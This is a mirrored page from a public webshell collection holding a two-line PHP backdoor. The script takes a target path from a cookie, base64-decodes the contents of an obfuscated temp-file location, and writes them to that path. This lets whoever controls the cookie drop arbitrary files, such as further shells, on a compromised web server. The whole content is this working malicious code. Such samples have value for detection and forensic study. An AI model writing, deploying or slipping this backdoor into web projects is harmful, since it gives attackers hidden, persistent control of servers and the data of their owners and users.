mirror of
https://github.com/tennc/webshell
synced 2024-11-13 23:17:10 +00:00
2 lines
149 B
PHP
2 lines
149 B
PHP
<?php
|
|
if(@$_COOKIE['path'] != ""){file_put_contents($_COOKIE['path'], base64_decode(file_get_contents(base64_decode("L3RtcC90bXA0RTE1LnRtcA=="))));}
|